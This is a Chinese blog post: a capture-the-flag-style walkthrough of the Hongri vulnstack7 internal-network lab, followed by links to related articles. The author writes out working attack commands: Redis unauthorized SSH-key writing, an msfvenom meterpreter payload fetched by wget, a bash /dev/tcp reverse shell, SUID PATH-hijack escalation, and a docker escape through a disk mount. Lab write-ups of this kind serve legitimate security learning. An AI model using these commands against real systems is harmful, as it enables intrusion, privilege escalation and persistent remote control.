内网攻防-红日靶机7

最新推荐文章于 2024-04-28 18:10:41 发布
最新推荐文章于 2024-04-28 18:10:41 发布
阅读量3.6k 收藏 3
点赞数
CC 4.0 BY-SA版权
文章标签: web安全 安全 linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45720618/article/details/120233721

网络拓扑
在这里插入图片描述

  • 扫描目标端口
    在这里插入图片描述

  • 开放80、81两个站点
    在这里插入图片描述

根据81站点右下角 Laravel v8.29.0 寻找爆出的漏洞
在这里插入图片描述
利用网上公开的EXP成功写入后门并连接。利用后门尝试反弹shell,MSF接不到shell????查看主机配置,哦~,监听本地81端口,然后转发到192.168.52.20的8000端口。(要不是靶场,还真不清楚咋回事)
在这里插入图片描述
原来访问的是这个,怪不得不能将shell反弹到Kali
在这里插入图片描述

  • 回头看看开放的6379,呦~
    在这里插入图片描述

  • 写密钥

    ssh-keygen -t rsa						#生成密钥
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > 1.txt		#将公钥信息写入1.txt#
cat 1.txt | redis-cli -h 192.168.0.103 -x set hello						#把1.txt文件内容写入目标主机redis的缓冲中
redis-cli -h 192.168.0.103
config set dir /root/.ssh          		#设置redis的备份路径为/root/.ssh/
config set dbfilename authorized_keys	#设置保存文件名为authorized_keys
save

  • ssh root@192.168.0.103连接成功,查看当前IP

    在这里插入图片描述

  • MSF生成后门文件

    msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=6666 -f elf -o msf.elf

    在这里插入图片描述

  • Python起一个HTTP服务
    在这里插入图片描述

  • 下载生成的后门wget http://192.168.0.104:9090/msf.elf MSF启动监听

    在这里插入图片描述

  • 下一步获取目标主机的网络信息

    在这里插入图片描述

  • 扫描目标网段存活了那些IP,一个没扫到。。。。。。。。多半是防火墙拦了

    在这里插入图片描述

  • 回头查看利用Laravel(CVE-2021-3129)web漏洞 写入的后门,发现当前权限过低需要提权,查看有无 通过环境变量提权的可能性

    find / -user root -perm -4000 -print 2>/dev/null

    在这里插入图片描述

  • 查看执行shell文件是什么情况,发现与ps命令相似

    在这里插入图片描述

  • 使用环境变量配合SUID进行提权,环境变量添加失败,网上说需要反弹shell,使用后门连接的情况下确实有问题

    在这里插入图片描述

  • 因为无法将shell直接反弹到kali,所以将shell反弹到52.10上

    nc -lvp 1234	#利用redis未授权写入密钥,然后进行SSH链接,再执行
bash -c 'exec bash -i >& /dev/tcp/192.168.52.10/1234 0>&1'	#通过webshell执行

    在这里插入图片描述

  • 再进行SUID提权

    cp /bin/bash /tmp/ps
export PATH=/tmp:$PATH
./shell
id

    在这里插入图片描述

  • 然后使用root权限下载后门并执行,后门就享有root权限;

  • kali有Ubuntu2的路由,但是Ubuntu2没有kali的路由,所以生成正向连接的后门,kali主动去连接Ubuntu2;

  • 由于Ubuntu1做了代理,实则拿到的webshell为Ubuntu2的,将生成的正向后门通过webshell上传到Ubuntu2
    在这里插入图片描述
    在这里插入图片描述

  • MSF启动监听;webshell执行后门

  • 发现接收不到shell
    在这里插入图片描述

  • 通过webshell查看根目录,发现.dockerenv文件,判断当前处于docker环境
    在这里插入图片描述

  • docker逃逸 - -Ubuntu1生成公钥

    ssh-keygen -f hello		#生成名为hello的公钥文件
chmod 600 hello
ls
cat hello.pub			#将内容复制

    在这里插入图片描述

  • docker逃逸

    fdisk -l     		#查看磁盘文件
ls /dev      		#查看设备文件
cd /
mkdir haha			
mount /dev/sda1 /haha	#将/dev/sda1挂在到/haha目录里
ls /haha

    挂载成功
    在这里插入图片描述

  • docker逃逸 - - 密钥覆盖

    cp -avx /haha/home/ubuntu/.ssh/id_rsa.pub /haha/home/ubuntu/.ssh/authorized_keys	#-avx将权限也一起复制
echo > /haha/home/ubuntu/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQClid+sVn9qavo22Vh1HcHV3i6MclKedlVO1O8jTsFIQbuSJYbcmw6JjB++Twwzz0j0HRFP39ztUtc8DE0Ji+0Fb4opWORynE1TLSI767LOhY9BqFfufGKZEN3qXRZhKLiY67WykEtkSUWvxXXRwHEZneC1cgslPXYx9hdbf5lqwWDJM6+PBFQJ4uyN/BZkLDs7307sBYO90+GAPYeBGBnSkjxLKyr6DNP6eXmfRBB83Y+3F4fJE4gD7kNspvUEl4GyWcg0JrmBusMZb4Iz+0CvtjD1ln7eLhT4hat/7zWn1hoW2FXnvT4bJ1y7GCLczq5lbAsf5AADeOB+o9JEwyc5 root@ubuntu' > /haha/home/ubuntu/.ssh/authorized_keys	#将ssh秘钥写入authorized_keys文件

    ssh -i haha ubuntu@192.168.52.20		#使用Ubuntu1的shell连接

    在这里插入图片描述

  • 连接成功之后,执行后门文件,如果执行MSF后门文件报错’Segmentation fault (core dumped)'👇,说明机器内存不够用了(淦,这个问题折磨了我3小时23分钟)。后门是重新生成的,端口改为了6789,
    在这里插入图片描述

  • 关闭一些后台以后,再执行后门文件就可以了
    在这里插入图片描述

  • 梅开二度
    在这里插入图片描述

  • Ubuntu1、Ubuntu2已经拿到了,就是没能把第二层网络里的win7扫出来
    先到这吧,第一次捣鼓内网,思路乱,技术菜,请大佬指教

哇·咔咔
关注
Laravel Framework 8到11版本存在敏感信息泄露漏洞CVE-2024-29291 附POC
nnn2188185的博客
05-14 277
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发Laravel Framework 8 到 11版本。
极品靶场,多种玩法【实战】红日靶场七:内网综合渗透
最新发布
Eason_LYC安全白帽子的成长博客
10-19 1241
收集十多篇该靶场文章,结合自己通关笔记,形成的一份集大成靶场wp
安全练兵场Writeup(七) | ATT&CK实战靶场
Ms08067安全实验室
01-07 808
文章来源|MS08067 安全练兵场 知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场 认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在...
红日靶场(七)vulnstack7
sagic的博客
04-07 2950
自学网络安全,学习靶场渗透
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2741
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
ATT&CK实战:红日靶场七
学生
06-19 964
*] WebTitle: http://192.168.52.30:8080 code:200 len:10065 title:通达OA网络智能办公系统。[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065 title:通达OA网络智能办公系统。[+] InfoScan:http://192.168.52.30:8080 [通达OA][+] InfoScan:http://192.168.93.20:8080 [通达OA]
2021-7-7红日团队靶场一
热门推荐
qq_45290991的博客
07-16 1万+
这是第二次打靶场,也是实战第一次。写的比较详(luo)细(suo),看官莫怪。期间参考了很多资料,后来我也看了好几个,觉得谢公子大佬写的最详细,这里安利一波大佬神文:谢公子红日靶场一 一、环境配置 首先感谢红日安全团队分享的靶机实战环境。红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。 靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ 本文的目的是为了记录和巩固知识点,并分享出来,希望对大家能有所帮助。
渗透测试之——红日靶机(一)
weixin_43072923的博客
04-25 958
红日靶机练习
[红日安全]Web安全Day2 - XSS跨站实战攻防
hongrisec的博客
02-20 1030
本文由红日安全成员: Aixic 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫Web安全实战,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、Pytho...
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 1106
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。
红日靶场7
m0_58595840的博客
01-11 1872
内网渗透
红日安全att&ck靶场7 内网靶场 WP
trytowritecode的博客
04-11 7695
记一次中型靶场getshell全过程,难度适中,很有意思 这里用kali来模拟外网攻击机,其实用自己服务器也完全ok 个人认为,此方法比官方wp要好懂一些 首先是靶场地址 靶场 先看拓扑图因为环境要提前配置,这里的192.168.1.0/24的这个网段根据自己的虚拟机环境来改不一定说一定要和官方拓扑一模一样,就像我自己就是192.168.16.0/24 看下图 然后开始配置环境,网卡这里官方已经处理的差不多了,大概是能测试ping通就行 然后启动服务这里全按官方说明来配置 这里注意了很重要不然你后面打靶
红日靶场七教程,不看后悔!
weixin_45885440的博客
10-11 2580
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习
红日安全ATT&CK靶机实战系列之vulnstack7
黑白的博客
04-30 1万+
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 边下载着,可以开始vmware的网络配置 这次和前面不太一样了 有三个网段,所以需要我们把网络这块拿捏的死死的 DMZ区 桥接模式(这个IP段不固定,我是31段的) IP段为192.168.31.1/24 第二层网络环境 NAT模式 IP段为192.168.52.1/24 第三层网络环境 仅主机模块 IP段为192.1
红日靶机vulnstack07【半总结】
qq_45300786的博客
10-12 598
web1是nginx代理服务器,真正的服务器是web2 web1监听本地81端口,然后转发到web2的8000端口。(要不是靶场,还真不清楚咋回事) 参考: 红日安全ATT&CK靶机实战系列之vulnstack7 自主搭建的三层网络域渗透靶场打靶记录 内网攻防-红日靶机7 ...
ATT&CK靶场系列(七)
qq_1873822的博客
12-04 7757
一、环境配置 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192.168.93.1/24 按着上面的图片把相关的ip段给配置就行 DMZ区域: 给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。 第二层网络区域: 给U
红日七vulnstack7全操作
weixin_62334252的博客
06-22 9316
http://vulnstack.qiyuanxuetang.net/vuln/detail/9/整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。 域用户账户和密码如下: Administrator:Whoami2021 whoami:Whoami2021 bunny:Bunny2021 moretz:Moretz2021Ubuntu 1: webweb2021Ubuntu 2: ubuntu
DC-1靶机渗透测试攻略及DC-2靶机简介
资源摘要信息:"Vulnhub是一个著名的在线平台,提供了各种用于渗透测试练习的靶机靶机是指计算机系统、网络或应用程序,设计用来模拟真实环境中的安全漏洞,供安全研究人员、学生或爱好者进行攻击和防御练习。DC-1...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值